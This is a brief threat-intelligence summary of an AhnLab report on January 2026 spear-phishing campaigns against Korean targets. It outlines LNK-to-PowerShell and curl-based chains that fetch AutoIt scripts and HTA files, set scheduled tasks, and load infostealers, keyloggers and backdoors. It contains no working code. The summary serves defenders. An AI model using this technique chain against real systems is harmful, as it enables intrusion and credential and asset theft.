AhnLab's January 2026 domestic APT trends report says spear phishing dominated observed attacks against Korean targets, with LNK files representing the largest share of activity. One LNK chain runs PowerShell to reach external URLs, copies curl.exe under alternate names, downloads a legitimate AutoIt program and malicious AutoIt script, and registers scheduled tasks for persistence. Another LNK chain uses Windows curl.exe to download and execute HTA files from GitHub repositories or Google Drive, then drops downloaders that load an infostealer, keylogger, and backdoor in memory. The reported capabilities include command execution, directory listing, file upload, file download, system information theft, keylogging, and collection of virtual-asset-related information, making the activity relevant for Korean defenders monitoring malicious attachments and post-compromise tooling.